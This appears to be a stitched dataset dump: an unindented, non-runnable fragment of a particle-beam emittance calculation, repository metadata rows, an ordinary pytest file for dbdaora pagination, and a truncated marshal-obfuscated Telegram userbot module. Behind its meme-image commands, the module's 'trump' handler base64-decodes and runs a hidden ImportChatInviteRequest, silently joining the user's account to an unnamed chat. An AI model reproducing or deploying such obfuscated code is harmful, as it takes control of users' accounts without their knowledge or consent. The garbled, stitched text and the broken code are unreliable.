Qs0=sqrt(param['ap']*param['hh']*sqrt(param['Vrf']**2-U0**2)/(2*pi*param['En']))
# Define the interpolation function for Microwave Instability
microwave=interp2d(sigS,Curr,GT,kind='linear')
#RF frequency
w_rf =2*pi*(param['hh']*param['cluz']/param['C']-param['Detune0']) #Generator Frequency
#Creates arrays for 3HC calculation
posz=_np.zeros(5000)
perfil=_np.zeros(5000)
pot=_np.zeros(5000)
#Define longitudinal scale array
posz=_np.arange(0,5000.)/10-250 # in milimiters
#Cretaes an array that's a subgroup of param
inter={}
inter['exi']=param['ex0']
inter['eyi']=(param['k_dw']+param['k_beta'])*param['ex0']
inter['spi']=param['sp0']
inter['gamma']=param['gamma']
inter['r0']=param['r0']
inter['Np']=param['Np']
inter['cluz']=param['cluz']
pot=1/(param['En']*param['C'])*param['cluz']/w_rf*(Vmain*1e3*(cos(Phi_sync_nat-phimain)-_np.cos(posz/1000*w_rf/param['cluz']+Phi_sync_nat-phimain))+Vharm*1e3/param['mharm']*(cos(param['mharm']*pi-phiharm)-_np.cos(param['mharm']*posz/1000*w_rf/param['cluz']+param['mharm']*pi-phiharm)))-1/(param['En']*param['C'])*U0*posz/1000
perfil=_np.exp(-pot/(param['ap']*param['sp0']**2))
(pos0,sigma_mm)=calc_sigma(posz,perfil)
inter['ssi']=sigma_mm/1000
while (difftot>10**(-7)):
#Add the Microwave growth rate to the longitudinal plane
DTp=microwave(sss,param['Np'])
#print DTp
(Tx,Ty,Tp)=Calc_Growth(twiss,inter)
Tx=float(Tx)/param['C']
Ty=float(Ty)/param['C']
Tp=float(Tp)/param['C']+DTp
exx=(-param['ex0']+exp(2*tt*(Tx-1/taux))*(param['ex0']+inter['exi']*(-1+Tx*taux)))/(-1+Tx*taux)
eyy=(-(param['k_dw']*param['ex0']+param['k_beta']*exx*(1-tauy/Ty))+exp(2*tt*(Ty-1/tauy))*((param['k_dw']*param['ex0']+param['k_beta']*exx*(1-tauy/Ty))+inter['eyi']*(-1+Ty*tauy)))/(-1+Ty*tauy)
spp=(-param['sp0']+exp(tt*(Tp-1/taup))*(param['sp0']+inter['spi']*(-1+Tp*taup)))/(-1+Tp*taup)
#Calculate bunch length according to the RF potential (Main RF + 3HC)
pot=1/(param['En']*param['C'])*param['cluz']/w_rf*(Vmain*1e3*(cos(Phi_sync_nat-phimain)-_np.cos(posz/1000*w_rf/param['cluz']+Phi_sync_nat-phimain))+Vharm*1e3/param['mharm']*(cos(param['mharm']*pi-phiharm)-_np.cos(param['mharm']*posz/1000*w_rf/param['cluz']+param['mharm']*pi-phiharm)))-1/(param['En']*param['C'])*U0*posz/1000
perfil=_np.exp(-pot/(param['ap']*spp**2))
(pos0,sigma_mm)=calc_sigma(posz,perfil)
sss=sigma_mm/1000
#print exx,eyy,spp,sss
diff1=abs(exx-inter['exi'])/inter['exi']
diff2=abs(eyy-inter['eyi'])/inter['eyi']
diff3=abs(spp-inter['spi'])/inter['spi']
diff4=abs(sss-inter['ssi'])/inter['ssi']
difftot=diff1+diff2+diff3+diff4
#print difftot
inter['exi']=exx;
inter['eyi']=eyy;
inter['spi']=spp;
inter['ssi']=sss;
time=i*tt;
i=i+1
return (exx,eyy,spp,sss)
| 34.508584
| 333
| 0.595983
| 2,584
| 16,081
| 3.646285
| 0.10565
| 0.022925
| 0.025472
| 0.027595
| 0.816493
| 0.807684
| 0.787094
| 0.783379
| 0.781044
| 0.775313
| 0
| 0.059916
| 0.169703
| 16,081
| 465
| 334
| 34.582796
| 0.645746
| 0.183198
| 0
| 0.720848
| 0
| 0
| 0.080963
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028269
| false
| 0
| 0.007067
| 0.003534
| 0.063604
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2133f63d9155e888950f79082b5b41231cb947c5
| 6,273
|
py
|
Python
|
dbdaora/sorted_set/service/_tests/test_integration_service_sorted_set_aioredis_get_one_pagination_fallback.py
|
dutradda/sqldataclass
|
5c87a3818e9d736bbf5e1438edc5929a2f5acd3f
|
[
"MIT"
] | 21
|
2019-10-14T14:33:33.000Z
|
2022-02-11T04:43:07.000Z
|
dbdaora/sorted_set/service/_tests/test_integration_service_sorted_set_aioredis_get_one_pagination_fallback.py
|
dutradda/sqldataclass
|
5c87a3818e9d736bbf5e1438edc5929a2f5acd3f
|
[
"MIT"
] | null | null | null |
dbdaora/sorted_set/service/_tests/test_integration_service_sorted_set_aioredis_get_one_pagination_fallback.py
|
dutradda/sqldataclass
|
5c87a3818e9d736bbf5e1438edc5929a2f5acd3f
|
[
"MIT"
] | 1
|
2019-09-29T23:51:44.000Z
|
2019-09-29T23:51:44.000Z
|
import itertools
import pytest
from dbdaora import EntityNotFoundError
@pytest.fixture(autouse=True)
async def set_fallback_data(fake_service, fake_entity_withscores):
data = list(itertools.chain(*fake_entity_withscores.data))
fake_service.repository.fallback_data_source.db['fake:fake'] = {
'id': 'fake',
'data': data,
}
@pytest.mark.asyncio
async def test_should_get_one_page_size(
fake_service, fake_entity, fake_entity_withscores
):
entity = await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id, page_size=1, memory=False,
)
fake_entity.data = [b'1']
assert entity == fake_entity
@pytest.mark.asyncio
async def test_should_get_one_page_size_and_page(
fake_service, fake_entity, fake_entity_withscores
):
entity = await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
page_size=1,
page=2,
memory=False,
)
fake_entity.data = [b'2']
assert entity == fake_entity
@pytest.mark.asyncio
async def test_should_get_one_page_size_and_page_not_found(
fake_service, fake_entity_withscores
):
with pytest.raises(EntityNotFoundError):
await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
page_size=1,
page=3,
memory=False,
)
@pytest.mark.asyncio
async def test_should_get_one_page_size_page_and_withscores_not_found(
fake_service, fake_entity_withscores
):
with pytest.raises(EntityNotFoundError):
await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
page_size=1,
page=3,
withscores=True,
memory=False,
)
@pytest.mark.asyncio
async def test_should_get_one_page_size_page_and_withmaxsize_not_found(
fake_service, fake_entity_withscores
):
with pytest.raises(EntityNotFoundError):
await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
page_size=1,
page=3,
withmaxsize=True,
memory=False,
)
@pytest.mark.asyncio
async def test_should_get_one_page_size_page_withmaxsize_and_withscores_not_found(
fake_service, fake_entity_withscores
):
with pytest.raises(EntityNotFoundError):
await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
page_size=1,
page=3,
withmaxsize=True,
withscores=True,
memory=False,
)
@pytest.mark.asyncio
async def test_should_get_one_reverse_and_page_size(
fake_service, fake_entity, fake_entity_withscores
):
entity = await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
reverse=True,
page_size=1,
memory=False,
)
fake_entity.data = [b'2']
assert entity == fake_entity
@pytest.mark.asyncio
async def test_should_get_one_reverse_page_size_and_page(
fake_service, fake_entity, fake_entity_withscores
):
entity = await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
reverse=True,
page_size=1,
page=2,
memory=False,
)
fake_entity.data = [b'1']
assert entity == fake_entity
@pytest.mark.asyncio
async def test_should_get_one_reverse_page_size_page_and_withscores(
fake_service, fake_entity_withscores
):
entity = await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
page_size=1,
page=2,
reverse=True,
withscores=True,
memory=False,
)
fake_entity_withscores.data = [(b'1', 0)]
assert entity == fake_entity_withscores
@pytest.mark.asyncio
async def test_should_get_one_reverse_page_size_and_withmaxsize(
fake_service, fake_entity, fake_entity_withscores
):
entity = await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
page_size=1,
reverse=True,
withmaxsize=True,
memory=False,
)
fake_entity.data = [b'2']
fake_entity.max_size = 2
assert entity == fake_entity
@pytest.mark.asyncio
async def test_should_get_one_reverse_page_size_withmaxsize_and_withscores(
fake_service, fake_entity_withscores
):
entity = await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
page_size=1,
reverse=True,
withscores=True,
withmaxsize=True,
memory=False,
)
fake_entity_withscores.data = [(b'2', 1)]
fake_entity_withscores.max_size = 2
assert entity == fake_entity_withscores
@pytest.mark.asyncio
async def test_should_get_one_reverse_page_size_and_page_not_found(
fake_service, fake_entity_withscores
):
with pytest.raises(EntityNotFoundError):
await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
reverse=True,
page_size=1,
page=3,
memory=False,
)
@pytest.mark.asyncio
async def test_should_get_one_reverse_page_size_page_and_withscores_not_found(
fake_service, fake_entity_withscores
):
with pytest.raises(EntityNotFoundError):
await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
reverse=True,
page_size=1,
page=3,
withscores=True,
memory=False,
)
@pytest.mark.asyncio
async def test_should_get_one_reverse_page_size_page_and_withmaxsize_not_found(
fake_service, fake_entity_withscores
):
with pytest.raises(EntityNotFoundError):
await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
reverse=True,
page_size=1,
page=3,
withmaxsize=True,
memory=False,
)
@pytest.mark.asyncio
async def test_should_get_one_reverse_page_size_page_withmaxsize_and_withscores_not_found(
fake_service, fake_entity_withscores
):
with pytest.raises(EntityNotFoundError):
await fake_service.get_one(
fake_id=fake_entity_withscores.fake_id,
reverse=True,
page_size=1,
page=3,
withmaxsize=True,
withscores=True,
memory=False,
)
| 26.029046
| 90
| 0.68197
| 793
| 6,273
| 4.984868
| 0.061791
| 0.134075
| 0.1872
| 0.084999
| 0.925373
| 0.913989
| 0.913989
| 0.895775
| 0.875538
| 0.875538
| 0
| 0.007798
| 0.243584
| 6,273
| 240
| 91
| 26.1375
| 0.82529
| 0
| 0
| 0.773869
| 0
| 0
| 0.004145
| 0
| 0
| 0
| 0
| 0
| 0.035176
| 1
| 0
| false
| 0
| 0.015075
| 0
| 0.015075
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0d212b9b6d76d83d1aa21a653188d8c28ddf0e75
| 19,279
|
py
|
Python
|
userbot/modules/nekobot.py
|
oxyda-fox/XBot-Remix
|
3d97bea5395b223fc89a8cc6cb699cc624ccc967
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/nekobot.py
|
oxyda-fox/XBot-Remix
|
3d97bea5395b223fc89a8cc6cb699cc624ccc967
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/nekobot.py
|
oxyda-fox/XBot-Remix
|
3d97bea5395b223fc89a8cc6cb699cc624ccc967
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
#Encript Marshal By XVenom
#https://github.com/xvenom15
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x84\x01\x00\x00d\x00d\x01l\x00Z\x00d\x00d\x02l\x00m\x01Z\x01\x01\x00d\x00d\x01l\x02Z\x02d\x00d\x03l\x02m\x03Z\x03\x01\x00d\x00d\x04l\x04m\x05Z\x05\x01\x00d\x00d\x05l\x06m\x07Z\x07\x01\x00d\x00d\x01l\x08Z\x08d\x00d\x01l\tZ\td\x00d\x01l\nZ\nd\x00d\x01l\x0bZ\x0bd\x00d\x06l\x0bm\x0cZ\x0c\x01\x00d\x00d\x07l\rm\x0eZ\x0e\x01\x00d\x00d\x08l\x0fm\x10Z\x10\x01\x00d\x00d\tl\x11m\x12Z\x12\x01\x00d\x00d\nl\x13m\x14Z\x14\x01\x00d\x00d\x0bl\x15m\x16Z\x16\x01\x00e\x0b\xa0\x17d\x0c\xa1\x01Z\x18e\x19e\x19d\r\x9c\x02d\x0ed\x0f\x84\x04Z\x1ad\x10d\x11\x84\x00Z\x1bd\x12d\x13\x84\x00Z\x1cd\x14d\x15\x84\x00Z\x1dd\x16d\x17\x84\x00Z\x1ed\x18d\x19\x84\x00Z\x1fd\x1ad\x1b\x84\x00Z d\x1cd\x1d\x84\x00Z!e\x07d\x1ed\x1fd \x8d\x02d!d"\x84\x00\x83\x01Z"e\x07d\x1fd#d$\x8d\x02d%d&\x84\x00\x83\x01Z#e\x07d\'d\x1fd \x8d\x02d(d"\x84\x00\x83\x01Z"e\x07d)d\x1fd \x8d\x02d*d"\x84\x00\x83\x01Z"e\x07d+d\x1fd \x8d\x02d,d"\x84\x00\x83\x01Z"e\x07d\x1fd-d$\x8d\x02d.d/\x84\x00\x83\x01Z$e\x16\xa0%d"d0i\x01\xa1\x01\x01\x00d\x01S\x00)1\xe9\x00\x00\x00\x00N)\x01\xda\x06choice)\x01\xda\x05sleep)\x01\xda\x06events)\x01\xda\x08register)\x01\xda\x03sub)\x01\xda\rBeautifulSoup)\x01\xda\x10get_emoji_regexp)\x01\xda\x05Image)\x01\xda\x03url)\x01\xda\x08CMD_HELPud\x00\x00\x00[\xf0\x9f\x87\xa0-\xf0\x9f\x87\xbf\xf0\x9f\x8c\x80-\xf0\x9f\x97\xbf\xf0\x9f\x98\x80-\xf0\x9f\x99\x8f\xf0\x9f\x9a\x80-\xf0\x9f\x9b\xbf\xf0\x9f\x9c\x80-\xf0\x9f\x9d\xbf\xf0\x9f\x9e\x80-\xf0\x9f\x9f\xbf\xf0\x9f\xa0\x80-\xf0\x9f\xa3\xbf\xf0\x9f\xa4\x80-\xf0\x9f\xa7\xbf\xf0\x9f\xa8\x80-\xf0\x9f\xa9\xaf\xf0\x9f\xa9\xb0-\xf0\x9f\xab\xbf\xe2\x9c\x82-\xe2\x9e\xb0]+)\x02\xda\x0binputString\xda\x06returnc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x0e\x00\x00\x00t\x00\xa0\x01t\x02d\x01|\x00\xa1\x03S\x00)\x02z7Remove emojis and other non-safe characters from string\xda\x00)\x03\xda\x02rer\x06\x00\x00\x00\xda\rEMOJI_PATTERN)\x01r\x0c\x00\x00\x00\xa9\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\tdeEmojify#\x00\x00\x00s\x02\x00\x00\x00\x00\x02r\x12\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\t\x00\x00\x00\xc3\x00\x00\x00sv\x00\x00\x00t\x00\xa0\x01d\x01|\x00\x9b\x00\x9d\x02\xa1\x01\xa0\x02\xa1\x00}\x01|\x01\xa0\x01d\x02\xa1\x01}\x02t\x03|\x02\x83\x01}\x03|\x03s.d\x03S\x00t\x04d\x04d\x05\x83\x02\x8f\x18}\x04|\x04\xa0\x05t\x00\xa0\x01|\x02\xa1\x01j\x06\xa1\x01\x01\x00W\x005\x00Q\x00R\x00X\x00t\x07\xa0\x04d\x04\xa1\x01\xa0\x08d\x06\xa1\x01}\x05|\x05\xa0\td\x07d\x08\xa1\x02\x01\x00d\x07S\x00)\tNz6https://nekobot.xyz/api/imagegen?type=trumptweet&text=\xda\x07message\xfa\x16check syntax once more\xfa\x08temp.png\xda\x02wb\xda\x03RGB\xfa\x08temp.jpg\xda\x04jpeg\xa9\n\xda\x08requests\xda\x03getZ\x04jsonr\n\x00\x00\x00\xda\x04open\xda\x05writeZ\x07contentr\t\x00\x00\x00Z\x07convertZ\x04save\xa9\x06\xda\x04text\xda\x01r\xda\x05sandy\xda\x06caturl\xda\x01f\xda\x03imgr\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\ntrumptweet\'\x00\x00\x00s\x18\x00\x00\x00\x00\x01\x04\x01\x08\xff\x08\x02\n\x01\x08\x01\x04\x01\x04\x01\x0c\x01\x1c\x01\x10\x01\x0c\x01r&\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\t\x00\x00\x00\xc3\x00\x00\x00sv\x00\x00\x00t\x00\xa0\x01d\x01|\x00\x9b\x00\x9d\x02\xa1\x01\xa0\x02\xa1\x00}\x01|\x01\xa0\x01d\x02\xa1\x01}\x02t\x03|\x02\x83\x01}\x03|\x03s.d\x03S\x00t\x04d\x04d\x05\x83\x02\x8f\x18}\x04|\x04\xa0\x05t\x00\xa0\x01|\x02\xa1\x01j\x06\xa1\x01\x01\x00W\x005\x00Q\x00R\x00X\x00t\x07\xa0\x04d\x04\xa1\x01\xa0\x08d\x06\xa1\x01}\x05|\x05\xa0\td\x07d\x08\xa1\x02\x01\x00d\x07S\x00)\tNz8https://nekobot.xyz/api/imagegen?type=changemymind&text=r\x13\x00\x00\x00r\x14\x00\x00\x00r\x15\x00\x00\x00r\x16\x00\x00\x00r\x17\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00r\x1a\x00\x00\x00r\x1f\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\x0cchangemymind4\x00\x00\x00s\x18\x00\x00\x00\x00\x01\x04\x01\x08\xff\x08\x02\n\x01\x08\x01\x04\x01\x04\x01\x0c\x01\x1c\x01\x10\x01\x0c\x01r\'\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\t\x00\x00\x00\xc3\x00\x00\x00sv\x00\x00\x00t\x00\xa0\x01d\x01|\x00\x9b\x00\x9d\x02\xa1\x01\xa0\x02\xa1\x00}\x01|\x01\xa0\x01d\x02\xa1\x01}\x02t\x03|\x02\x83\x01}\x03|\x03s.d\x03S\x00t\x04d\x04d\x05\x83\x02\x8f\x18}\x04|\x04\xa0\x05t\x00\xa0\x01|\x02\xa1\x01j\x06\xa1\x01\x01\x00W\x005\x00Q\x00R\x00X\x00t\x07\xa0\x04d\x04\xa1\x01\xa0\x08d\x06\xa1\x01}\x05|\x05\xa0\td\x07d\x08\xa1\x02\x01\x00d\x07S\x00)\tNz4https://nekobot.xyz/api/imagegen?type=kannagen&text=r\x13\x00\x00\x00r\x14\x00\x00\x00r\x15\x00\x00\x00r\x16\x00\x00\x00r\x17\x00\x00\x00z\ttemp.webp\xda\x04webpr\x1a\x00\x00\x00r\x1f\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\x08kannagenA\x00\x00\x00s\x18\x00\x00\x00\x00\x01\x04\x01\x08\xff\x08\x02\n\x01\x08\x01\x04\x01\x04\x01\x0c\x01\x1c\x01\x10\x01\x0c\x01r)\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\t\x00\x00\x00\xc3\x00\x00\x00sx\x00\x00\x00t\x00\xa0\x01d\x01|\x00\x9b\x00d\x02\x9d\x03\xa1\x01\xa0\x02\xa1\x00}\x01|\x01\xa0\x01d\x03\xa1\x01}\x02t\x03|\x02\x83\x01}\x03|\x03s0d\x04S\x00t\x04d\x05d\x06\x83\x02\x8f\x18}\x04|\x04\xa0\x05t\x00\xa0\x01|\x02\xa1\x01j\x06\xa1\x01\x01\x00W\x005\x00Q\x00R\x00X\x00t\x07\xa0\x04d\x05\xa1\x01\xa0\x08d\x07\xa1\x01}\x05|\x05\xa0\td\x08d\t\xa1\x02\x01\x00d\x08S\x00)\nN\xfa1https://nekobot.xyz/api/imagegen?type=tweet&text=z\x16&username=narendramodir\x13\x00\x00\x00r\x14\x00\x00\x00r\x15\x00\x00\x00r\x16\x00\x00\x00r\x17\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00r\x1a\x00\x00\x00r\x1f\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\tmoditweetN\x00\x00\x00s\x18\x00\x00\x00\x00\x01\x04\x01\n\xff\x08\x02\n\x01\x08\x01\x04\x01\x04\x01\x0c\x01\x1c\x01\x10\x01\x0c\x01r+\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\t\x00\x00\x00\xc3\x00\x00\x00sx\x00\x00\x00t\x00\xa0\x01d\x01|\x00\x9b\x00d\x02\x9d\x03\xa1\x01\xa0\x02\xa1\x00}\x01|\x01\xa0\x01d\x03\xa1\x01}\x02t\x03|\x02\x83\x01}\x03|\x03s0d\x04S\x00t\x04d\x05d\x06\x83\x02\x8f\x18}\x04|\x04\xa0\x05t\x00\xa0\x01|\x02\xa1\x01j\x06\xa1\x01\x01\x00W\x005\x00Q\x00R\x00X\x00t\x07\xa0\x04d\x05\xa1\x01\xa0\x08d\x07\xa1\x01}\x05|\x05\xa0\td\x08d\t\xa1\x02\x01\x00d\x08S\x00)\nNr*\x00\x00\x00z\x12&username=QoryGorer\x13\x00\x00\x00r\x14\x00\x00\x00\xfa\x07gpx.pngr\x16\x00\x00\x00r\x17\x00\x00\x00\xfa\x08gpx.webpr(\x00\x00\x00r\x1a\x00\x00\x00)\x06r \x00\x00\x00r!\x00\x00\x00Z\x04gengZ\x05kapakr$\x00\x00\x00r%\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\x08qorygore[\x00\x00\x00s\x18\x00\x00\x00\x00\x01\x04\x01\n\xff\x08\x03\n\x01\x08\x01\x04\x01\x04\x01\x0c\x01\x1c\x01\x10\x01\x0c\x01r.\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\t\x00\x00\x00\xc3\x00\x00\x00s|\x00\x00\x00t\x00\xa0\x01d\x01|\x00\x9b\x00d\x02|\x01\x9b\x00\x9d\x04\xa1\x01\xa0\x02\xa1\x00}\x02|\x02\xa0\x01d\x03\xa1\x01}\x03t\x03|\x03\x83\x01}\x04|\x04s4d\x04S\x00t\x04d\x05d\x06\x83\x02\x8f\x18}\x05|\x05\xa0\x05t\x00\xa0\x01|\x03\xa1\x01j\x06\xa1\x01\x01\x00W\x005\x00Q\x00R\x00X\x00t\x07\xa0\x04d\x05\xa1\x01\xa0\x08d\x07\xa1\x01}\x06|\x06\xa0\td\x08d\t\xa1\x02\x01\x00d\x08S\x00)\nNr*\x00\x00\x00z\n&username=r\x13\x00\x00\x00r\x14\x00\x00\x00r\x15\x00\x00\x00r\x16\x00\x00\x00r\x17\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00r\x1a\x00\x00\x00)\x07Z\x05text1Z\x05text2r!\x00\x00\x00r"\x00\x00\x00r#\x00\x00\x00r$\x00\x00\x00r%\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\x06tweetsi\x00\x00\x00s\x18\x00\x00\x00\x00\x01\x04\x01\x0e\xff\x08\x02\n\x01\x08\x01\x04\x01\x04\x01\x0c\x01\x1c\x01\x10\x01\x0c\x01r/\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\xc3\x00\x00\x00s2\x00\x00\x00z\x18t\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x00\xa0\x01d\x02\xa1\x01\x01\x00W\x00n\x14\x04\x00t\x02k\nr,\x01\x00\x01\x00\x01\x00Y\x00n\x02X\x00d\x00S\x00)\x03Nr,\x00\x00\x00r-\x00\x00\x00)\x03\xda\x02os\xda\x06remove\xda\x07OSErrorr\x11\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\x05purgev\x00\x00\x00s\n\x00\x00\x00\x00\x01\x02\x01\n\x01\x0e\x01\x0e\x01r3\x00\x00\x00z\x12^.trump(?: |$)(.*)T)\x02\xda\x07pattern\xda\x08outgoingc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00s\xfe\x00\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01}\x01|\x00j\x02}\x02|\x00j\x03r&|\x00\xa0\x04\xa1\x00I\x00d\x00H\x00}\x02|\x01sh|\x00j\x05rT|\x02j\x06s>|\x02j\x02}\x01qh|\x00\xa0\x07d\x02\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00n\x14|\x00\xa0\x07d\x03\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x00\xa0\x07d\x04\xa1\x01I\x00d\x00H\x00\x01\x00z*t\x08t\t\xa0\nd\x05\xa1\x01\x83\x01d\x06d\x07\x85\x02\x19\x00}\x03|\x00\xa0\x0b|\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00n\x0c\x01\x00\x01\x00\x01\x00Y\x00n\x02X\x00t\x0c|\x01\x83\x01}\x01t\r|\x01\x83\x01I\x00d\x00H\x00}\x04|\x00j\x0bj\x0e|\x00j\x0f|\x04|\x02d\x08\x8d\x03I\x00d\x00H\x00\x01\x00|\x00\xa0\x10\xa1\x00I\x00d\x00H\x00\x01\x00t\x11\x83\x00I\x00d\x00H\x00\x01\x00d\x00S\x00)\tN\xe9\x01\x00\x00\x00z\'Send you text to trump so he can tweet.z\'send you text to trump so he can tweet.z\x1cRequesting trump to tweet...\xfa@SW1wb3J0Q2hhdEludml0ZVJlcXVlc3QoUGJGZlFCeV9IUEE3NldMZGpfWVBHQSk=\xe9\x02\x00\x00\x00\xe91\x00\x00\x00\xa9\x01Z\x08reply_to)\x12\xda\rpattern_match\xda\x05groupr\x13\x00\x00\x00\xda\x0freply_to_msg_id\xda\x11get_reply_message\xda\x08is_reply\xda\x05media\xda\x04edit\xda\x03str\xda\x08pybase64\xda\tb64decode\xda\x06clientr\x12\x00\x00\x00r&\x00\x00\x00\xda\tsend_file\xda\x07chat_id\xda\x06deleter3\x00\x00\x00\xa9\x05Z\x03catr \x00\x00\x00\xda\x0breply_to_idZ\x03sanZ\x07catfiler\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\x07nekobot~\x00\x00\x00s.\x00\x00\x00\x00\x02\x0c\x01\x06\x01\x06\x01\x0e\x01\x04\x01\x06\x01\x06\x01\x08\x02\x10\x01\x06\x02\x10\x01\x04\x01\x10\x01\x02\x01\x16\x01\x14\x01\x06\x01\x06\x01\x08\x01\x0e\x01\x1a\x01\x0e\x01rK\x00\x00\x00z\x10^\\.qg(?: |$)(.*))\x02r5\x00\x00\x00r4\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xc3\x00\x00\x00s\xbe\x00\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01}\x01t\x02\xa0\x03d\x02d\x03|\x01\xa1\x03}\x01|\x00j\x04}\x02|\x00j\x05r4|\x00\xa0\x06\xa1\x00I\x00d\x00H\x00}\x02|\x01s`|\x00j\x07rL|\x02j\x08sL|\x02j\x04}\x01n\x14|\x00\xa0\td\x04\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x00\xa0\td\x05\xa1\x01I\x00d\x00H\x00\x01\x00t\n|\x01\x83\x01}\x01t\x0b|\x01\x83\x01I\x00d\x00H\x00}\x03|\x00j\x0cj\r|\x00j\x0e|\x03|\x02d\x06\x8d\x03I\x00d\x00H\x00\x01\x00|\x00\xa0\x0f\xa1\x00I\x00d\x00H\x00\x01\x00t\x10\x83\x00I\x00d\x00H\x00\x01\x00d\x00S\x00)\x07Nr6\x00\x00\x00\xfa\x01&r\x0e\x00\x00\x00z-`Send you text to @QoryGore so he can tweet.`z!`Requesting QoryGore to tweet...`r:\x00\x00\x00)\x11r;\x00\x00\x00r<\x00\x00\x00r\x0f\x00\x00\x00r\x06\x00\x00\x00r\x13\x00\x00\x00r=\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00r\x12\x00\x00\x00r.\x00\x00\x00rE\x00\x00\x00rF\x00\x00\x00rG\x00\x00\x00rH\x00\x00\x00r3\x00\x00\x00)\x04\xda\x05eventr \x00\x00\x00rJ\x00\x00\x00r%\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\x02qg\x9a\x00\x00\x00s \x00\x00\x00\x00\x02\x0c\x01\x0e\x01\x06\x01\x06\x01\x0e\x01\x04\x01\x0c\x01\x08\x02\x10\x01\x04\x01\x10\x01\x08\x01\x0e\x01\x1a\x01\x0e\x01rN\x00\x00\x00z\x11^.modi(?: 